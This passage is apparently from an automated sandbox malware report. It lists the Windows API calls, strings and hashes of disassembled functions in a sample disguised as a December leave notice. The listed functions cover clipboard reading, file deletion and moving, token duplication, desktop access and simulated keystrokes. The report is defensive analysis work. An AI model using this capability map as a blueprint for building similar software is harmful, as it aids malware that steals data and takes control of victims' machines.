                                                      • GetKeyState.USER32(00000010), ref: 00FEFA20
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00FEFA4F
                                                      • SendMessageW.USER32 ref: 00FEFA72
                                                      • SendMessageW.USER32(?,00001030,?,00FEE059), ref: 00FEFB6F
                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 00FEFB85
                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00FEFB96
                                                      • SetCapture.USER32(?), ref: 00FEFB9F
                                                      • ClientToScreen.USER32(?,?), ref: 00FEFC03
                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00FEFC0F
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00FEFC29
                                                      • ReleaseCapture.USER32 ref: 00FEFC34
                                                      • GetCursorPos.USER32(?), ref: 00FEFC69
                                                      • ScreenToClient.USER32(?,?), ref: 00FEFC76
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00FEFCD8
                                                      • SendMessageW.USER32 ref: 00FEFD02
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00FEFD41
                                                      • SendMessageW.USER32 ref: 00FEFD6C
                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00FEFD84
                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00FEFD8F
                                                      • GetCursorPos.USER32(?), ref: 00FEFDB0
                                                      • ScreenToClient.USER32(?,?), ref: 00FEFDBD
                                                      • GetParent.USER32(?), ref: 00FEFDD9
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00FEFE3F
                                                      • SendMessageW.USER32 ref: 00FEFE6F
                                                      • ClientToScreen.USER32(?,?), ref: 00FEFEC5
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00FEFEF1
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00FEFF19
                                                      • SendMessageW.USER32 ref: 00FEFF3C
                                                      • ClientToScreen.USER32(?,?), ref: 00FEFF86
                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00FEFFB6
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FF004B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                      • String ID: @GUI_DRAGID$F
                                                      • API String ID: 2516578528-4164748364
                                                      • Opcode ID: be039df2e0da2483eda8f01be7b7eb2d3b106d5e6ad2e2d45c77b76a1917a3a6
                                                      • Instruction ID: bd986dcd8f790e5517a6e5a298fb396ac8c275a650b0dcaf3361f19c1a41ea97
                                                      • Opcode Fuzzy Hash: be039df2e0da2483eda8f01be7b7eb2d3b106d5e6ad2e2d45c77b76a1917a3a6
                                                      • Instruction Fuzzy Hash: 0E32F374A04384EFDB21CF64C884B6ABBA4FF48364F144629F695C72A1C735ED48EB51
                                                      APIs
                                                      • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00FEB1CD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: %d/%02d/%02d
                                                      • API String ID: 3850602802-328681919
                                                      • Opcode ID: 75e9c875fee66ee3e3635b0376398c2867cc59a6f738ede0d8e0abb17e6394b0
                                                      • Instruction ID: 0deb6a9c04542dd2015ccbd8d170f0dd950e4619a4415e11e361a7bccc3e3f49
                                                      • Opcode Fuzzy Hash: 75e9c875fee66ee3e3635b0376398c2867cc59a6f738ede0d8e0abb17e6394b0
                                                      • Instruction Fuzzy Hash: 99121671900288ABEB258F6ACC49FAF7BB8FF45320F104119F916DB1D1DB799901EB21
                                                      APIs
                                                      • GetForegroundWindow.USER32(00000000,00000000), ref: 00F9EB4A
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FF3AEA
                                                      • IsIconic.USER32(000000FF), ref: 00FF3AF3
                                                      • ShowWindow.USER32(000000FF,00000009), ref: 00FF3B00
                                                      • SetForegroundWindow.USER32(000000FF), ref: 00FF3B0A
                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FF3B20
                                                      • GetCurrentThreadId.KERNEL32 ref: 00FF3B27
                                                      • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00FF3B33
                                                      • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00FF3B44
                                                      • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00FF3B4C
                                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 00FF3B54
                                                      • SetForegroundWindow.USER32(000000FF), ref: 00FF3B57
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FF3B6C
                                                      • keybd_event.USER32(00000012,00000000), ref: 00FF3B77
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FF3B81
                                                      • keybd_event.USER32(00000012,00000000), ref: 00FF3B86
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FF3B8F
                                                      • keybd_event.USER32(00000012,00000000), ref: 00FF3B94
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FF3B9E
                                                      • keybd_event.USER32(00000012,00000000), ref: 00FF3BA3
                                                      • SetForegroundWindow.USER32(000000FF), ref: 00FF3BA6
                                                      • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00FF3BCD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 4125248594-2988720461
                                                      • Opcode ID: 71edd5472cc4ed20501c77cae9d034423415c301f2efd60f0b9c4b17aa898345
                                                      • Instruction ID: e35a3ddf8f89e9f522ea60429a3e13efa92ab5babe2c064c52b762141ddd93f4
                                                      • Opcode Fuzzy Hash: 71edd5472cc4ed20501c77cae9d034423415c301f2efd60f0b9c4b17aa898345
                                                      • Instruction Fuzzy Hash: CB313E71A40318BBEB316BE59C49F7E7E6CEF84B60F104015FB45AA1D1DAB65900ABB0
                                                      APIs
                                                        • Part of subcall function 00FBB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FBB180
                                                        • Part of subcall function 00FBB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FBB1AD
                                                        • Part of subcall function 00FBB134: GetLastError.KERNEL32 ref: 00FBB1BA
                                                      • _memset.LIBCMT ref: 00FBAD08
                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00FBAD5A
                                                      • CloseHandle.KERNEL32(?), ref: 00FBAD6B
                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00FBAD82
                                                      • GetProcessWindowStation.USER32 ref: 00FBAD9B
                                                      • SetProcessWindowStation.USER32(00000000), ref: 00FBADA5
                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00FBADBF
                                                        • Part of subcall function 00FBAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FBACC0), ref: 00FBAB99
                                                        • Part of subcall function 00FBAB84: CloseHandle.KERNEL32(?,?,00FBACC0), ref: 00FBABAB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                      • String ID: $default$winsta0
                                                      • API String ID: 2063423040-1027155976
                                                      • Opcode ID: 015305ba37df98e9806d308ae03c0f6f7c1a3ff0386af8b4526e6f82c5d225ab
                                                      • Instruction ID: 891dae29b44e63314b2e4855f0a914e9d0ca9604c21f2aefeb3741e174d44909
                                                      • Opcode Fuzzy Hash: 015305ba37df98e9806d308ae03c0f6f7c1a3ff0386af8b4526e6f82c5d225ab
                                                      • Instruction Fuzzy Hash: E9817CB1C00209AFEF229FE6DC45AEEBB78EF08314F044119F914A6151DB768E55EF61
                                                      APIs
                                                        • Part of subcall function 00FC6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FC5FA6,?), ref: 00FC6ED8
                                                        • Part of subcall function 00FC6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FC5FA6,?), ref: 00FC6EF1
                                                        • Part of subcall function 00FC725E: __wsplitpath.LIBCMT ref: 00FC727B
                                                        • Part of subcall function 00FC725E: __wsplitpath.LIBCMT ref: 00FC728E
                                                        • Part of subcall function 00FC72CB: GetFileAttributesW.KERNEL32(?,00FC6019), ref: 00FC72CC
                                                      • _wcscat.LIBCMT ref: 00FC6149
                                                      • _wcscat.LIBCMT ref: 00FC6167
                                                      • __wsplitpath.LIBCMT ref: 00FC618E
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00FC61A4
                                                      • _wcscpy.LIBCMT ref: 00FC6209
                                                      • _wcscat.LIBCMT ref: 00FC621C
                                                      • _wcscat.LIBCMT ref: 00FC622F
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00FC625D
                                                      • DeleteFileW.KERNEL32(?), ref: 00FC626E
                                                      • MoveFileW.KERNEL32(?,?), ref: 00FC6289
                                                      • MoveFileW.KERNEL32(?,?), ref: 00FC6298
                                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 00FC62AD
                                                      • DeleteFileW.KERNEL32(?), ref: 00FC62BE
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FC62E1
                                                      • FindClose.KERNEL32(00000000), ref: 00FC62FD
                                                      • FindClose.KERNEL32(00000000), ref: 00FC630B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                      • String ID: \*.*
                                                      • API String ID: 1917200108-1173974218
                                                      • Opcode ID: b55ce66d67b2398abda57fe54122187d5cb94e7482970be83251261ce61ed295
                                                      • Instruction ID: 808743e5b603819af69dcb1497c9270ded37fee3ec4594f01b19a8a62ee19d16
                                                      • Opcode Fuzzy Hash: b55ce66d67b2398abda57fe54122187d5cb94e7482970be83251261ce61ed295
                                                      • Instruction Fuzzy Hash: C4512EB2C0821D6ACF21EB91CD45EEB77BCAF05310F0901EAE585E2141DE369789DFA4
                                                      APIs
                                                      • OpenClipboard.USER32(0101DC00), ref: 00FD6B36
                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00FD6B44
                                                      • GetClipboardData.USER32(0000000D), ref: 00FD6B4C
                                                      • CloseClipboard.USER32 ref: 00FD6B58
                                                      • GlobalLock.KERNEL32(00000000), ref: 00FD6B74
                                                      • CloseClipboard.USER32 ref: 00FD6B7E
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00FD6B93
                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00FD6BA0
                                                      • GetClipboardData.USER32(00000001), ref: 00FD6BA8
                                                      • GlobalLock.KERNEL32(00000000), ref: 00FD6BB5
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00FD6BE9
                                                      • CloseClipboard.USER32 ref: 00FD6CF6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                      • String ID:
                                                      • API String ID: 3222323430-0
                                                      • Opcode ID: 1205316f65f3ae518668a5bff01e9ab45ca5550a29f36e7f7b85feafab5fc659
                                                      • Instruction ID: 04d97a159e086b3b2021674fd4c464a9c299e94199d453956856268c264304e2
                                                      • Opcode Fuzzy Hash: 1205316f65f3ae518668a5bff01e9ab45ca5550a29f36e7f7b85feafab5fc659
                                                      • Instruction Fuzzy Hash: B451B431200201ABD311FFA0CD86F6E77A9AF98B21F04052AF586D72D1DF79D805AB72
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00FCF62B
                                                      • FindClose.KERNEL32(00000000), ref: 00FCF67F
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FCF6A4
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FCF6BB
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FCF6E2
                                                      • __swprintf.LIBCMT ref: 00FCF72E
                                                      • __swprintf.LIBCMT ref: 00FCF767
                                                      • __swprintf.LIBCMT ref: 00FCF7BB
                                                        • Part of subcall function 00FA172B: __woutput_l.LIBCMT ref: 00FA1784
                                                      • __swprintf.LIBCMT ref: 00FCF809
                                                      • __swprintf.LIBCMT ref: 00FCF858
                                                      • __swprintf.LIBCMT ref: 00FCF8A7
                                                      • __swprintf.LIBCMT ref: 00FCF8F6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                      • API String ID: 835046349-2428617273
                                                      • Opcode ID: d8ddc5f97cd71b7520719fae278fa155522ba8a3f9bbe3237b3e1ae70c6a7c15
                                                      • Instruction ID: 126c2226dc83816a48dbb0dd6b7b077df261960881e83df8413b16161c88fff1
                                                      • Opcode Fuzzy Hash: d8ddc5f97cd71b7520719fae278fa155522ba8a3f9bbe3237b3e1ae70c6a7c15
                                                      • Instruction Fuzzy Hash: 83A130B2408344ABD750EBA4CD86DAFB7ECBF98704F44082EF595C2151EB38D949E762
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00FD1B50
                                                      • _wcscmp.LIBCMT ref: 00FD1B65
                                                      • _wcscmp.LIBCMT ref: 00FD1B7C
                                                      • GetFileAttributesW.KERNEL32(?), ref: 00FD1B8E
                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00FD1BA8
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00FD1BC0
                                                      • FindClose.KERNEL32(00000000), ref: 00FD1BCB
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00FD1BE7
                                                      • _wcscmp.LIBCMT ref: 00FD1C0E
                                                      • _wcscmp.LIBCMT ref: 00FD1C25
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00FD1C37
                                                      • SetCurrentDirectoryW.KERNEL32(010339FC), ref: 00FD1C55
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FD1C5F
                                                      • FindClose.KERNEL32(00000000), ref: 00FD1C6C
                                                      • FindClose.KERNEL32(00000000), ref: 00FD1C7C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                      • String ID: *.*
                                                      • API String ID: 1803514871-438819550
                                                      • Opcode ID: 4a7bf5e932aaa6182685df758d009cc49698c840a409dd0a4e26367f0d9c64f4
                                                      • Instruction ID: 7cbfcda5c47df0a560c46207f5f9b4999dd95c79e8645dc5b93c68a76f648d65
                                                      • Opcode Fuzzy Hash: 4a7bf5e932aaa6182685df758d009cc49698c840a409dd0a4e26367f0d9c64f4
                                                      • Instruction Fuzzy Hash: 1B31D332A40219BFDF21ABF0DC49ADE77ADBF45320F180167E841E2180EB35DA459B64
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00FD1CAB
                                                      • _wcscmp.LIBCMT ref: 00FD1CC0
                                                      • _wcscmp.LIBCMT ref: 00FD1CD7
                                                        • Part of subcall function 00FC6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00FC6BEF
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00FD1D06
                                                      • FindClose.KERNEL32(00000000), ref: 00FD1D11
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00FD1D2D
                                                      • _wcscmp.LIBCMT ref: 00FD1D54
                                                      • _wcscmp.LIBCMT ref: 00FD1D6B
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00FD1D7D
                                                      • SetCurrentDirectoryW.KERNEL32(010339FC), ref: 00FD1D9B
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FD1DA5
                                                      • FindClose.KERNEL32(00000000), ref: 00FD1DB2
                                                      • FindClose.KERNEL32(00000000), ref: 00FD1DC2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                      • String ID: *.*
                                                      • API String ID: 1824444939-438819550
                                                      • Opcode ID: 99441f8846f468e714643c068fa81e92ea6319675df0c9cd91fb67f9eb4459df
                                                      • Instruction ID: 8835f0bec5e3bb3d80e99a097d448735f239b131b809377ee8276ca58f73eda5
                                                      • Opcode Fuzzy Hash: 99441f8846f468e714643c068fa81e92ea6319675df0c9cd91fb67f9eb4459df
                                                      • Instruction Fuzzy Hash: 2B31D23290061ABACF21ABE0DC49ADE77AEBF45330F180566E841E6281DB35DA45DB64
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _memset
                                                      • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                      • API String ID: 2102423945-2023335898
                                                      • Opcode ID: 8b09b72238c45fc224d8581de07f5806ebf7fcd2ad2f4726d3221ac81021242a
                                                      • Instruction ID: 564bc425b0917a0a99c793b880b6cff9c4814820d1e1d7529a409033adff1792
                                                      • Opcode Fuzzy Hash: 8b09b72238c45fc224d8581de07f5806ebf7fcd2ad2f4726d3221ac81021242a
                                                      • Instruction Fuzzy Hash: 8D82C272D04219CBCB24DF98C8807FDBBB1BF44320F2481A9D959AB391E7749D85EB80
                                                      APIs
                                                      • GetLocalTime.KERNEL32(?), ref: 00FD09DF
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FD09EF
                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00FD09FB
                                                      • __wsplitpath.LIBCMT ref: 00FD0A59
                                                      • _wcscat.LIBCMT ref: 00FD0A71
                                                      • _wcscat.LIBCMT ref: 00FD0A83
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FD0A98
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00FD0AAC
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00FD0ADE
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00FD0AFF
                                                      • _wcscpy.LIBCMT ref: 00FD0B0B
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00FD0B4A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                      • String ID: *.*
                                                      • API String ID: 3566783562-438819550
                                                      • Opcode ID: d949d7bb8e12d65b1c5dd2ab178f46df5df9cf764f8eca981fd6021a5d7aa9e3
                                                      • Instruction ID: d675629e036af21acb666afbcd11a6bd547e6cd95aa5f4fc2ecf69d1852a0f9b
                                                      • Opcode Fuzzy Hash: d949d7bb8e12d65b1c5dd2ab178f46df5df9cf764f8eca981fd6021a5d7aa9e3
                                                      • Instruction Fuzzy Hash: 326158725083059FD710EF60C845AAEB3E9BF89324F08891AE999C7341DB39E945DB92
                                                      APIs
                                                        • Part of subcall function 00FBABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00FBABD7
                                                        • Part of subcall function 00FBABBB: GetLastError.KERNEL32(?,00FBA69F,?,?,?), ref: 00FBABE1
                                                        • Part of subcall function 00FBABBB: GetProcessHeap.KERNEL32(00000008,?,?,00FBA69F,?,?,?), ref: 00FBABF0
                                                        • Part of subcall function 00FBABBB: HeapAlloc.KERNEL32(00000000,?,00FBA69F,?,?,?), ref: 00FBABF7
                                                        • Part of subcall function 00FBABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00FBAC0E
                                                        • Part of subcall function 00FBAC56: GetProcessHeap.KERNEL32(00000008,00FBA6B5,00000000,00000000,?,00FBA6B5,?), ref: 00FBAC62
                                                        • Part of subcall function 00FBAC56: HeapAlloc.KERNEL32(00000000,?,00FBA6B5,?), ref: 00FBAC69
                                                        • Part of subcall function 00FBAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00FBA6B5,?), ref: 00FBAC7A
                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00FBA6D0
                                                      • _memset.LIBCMT ref: 00FBA6E5
                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00FBA704
                                                      • GetLengthSid.ADVAPI32(?), ref: 00FBA715
                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00FBA752
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00FBA76E
                                                      • GetLengthSid.ADVAPI32(?), ref: 00FBA78B
                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00FBA79A
